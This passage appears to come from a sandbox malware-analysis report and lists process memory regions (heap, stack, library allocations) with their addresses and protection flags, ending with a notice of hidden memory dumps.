page read and write
|
||
|
1D610074000
|
trusted library allocation
|
page read and write
|
||
|
1D676740000
|
heap
|
page execute and read and write
|
||
|
1D6004B5000
|
trusted library allocation
|
page read and write
|
||
|
1D600ED6000
|
trusted library allocation
|
page read and write
|
||
|
1943596E000
|
heap
|
page read and write
|
||
|
1D676B50000
|
heap
|
page read and write
|
||
|
194358D8000
|
heap
|
page read and write
|
||
|
19433830000
|
heap
|
page read and write
|
||
|
1D601CD1000
|
trusted library allocation
|
page read and write
|
||
|
34778FE000
|
stack
|
page read and write
|
||
|
194358A6000
|
heap
|
page read and write
|
||
|
1D60049B000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F31000
|
trusted library allocation
|
page read and write
|
||
|
194338E4000
|
heap
|
page read and write
|
||
|
194358C4000
|
heap
|
page read and write
|
||
|
1D601608000
|
trusted library allocation
|
page read and write
|
||
|
194358C7000
|
heap
|
page read and write
|
||
|
194358B9000
|
heap
|
page read and write
|
||
|
194358AD000
|
heap
|
page read and write
|
||
|
19435953000
|
heap
|
page read and write
|
||
|
194358C4000
|
heap
|
page read and write
|
||
|
1D600B4A000
|
trusted library allocation
|
page read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
19435873000
|
heap
|
page read and write
|
||
|
194338C4000
|
heap
|
page read and write
|
||
|
5FBA0FE000
|
stack
|
page read and write
|
||
|
19435757000
|
heap
|
page read and write
|
||
|
1D6017B8000
|
trusted library allocation
|
page read and write
|
||
|
194358D1000
|
heap
|
page read and write
|
||
|
194337C0000
|
heap
|
page read and write
|
||
|
7FF887100000
|
trusted library allocation
|
page execute and read and write
|
||
|
1943597D000
|
heap
|
page read and write
|
||
|
1D676595000
|
heap
|
page read and write
|
||
|
1D601829000
|
trusted library allocation
|
page read and write
|
||
|
194338C2000
|
heap
|
page read and write
|
||
|
1D601652000
|
trusted library allocation
|
page read and write
|
||
|
1943575A000
|
heap
|
page read and write
|
||
|
1D610001000
|
trusted library allocation
|
page read and write
|
||
|
1D601162000
|
trusted library allocation
|
page read and write
|
There are 352 hidden memdumps, click here to show them.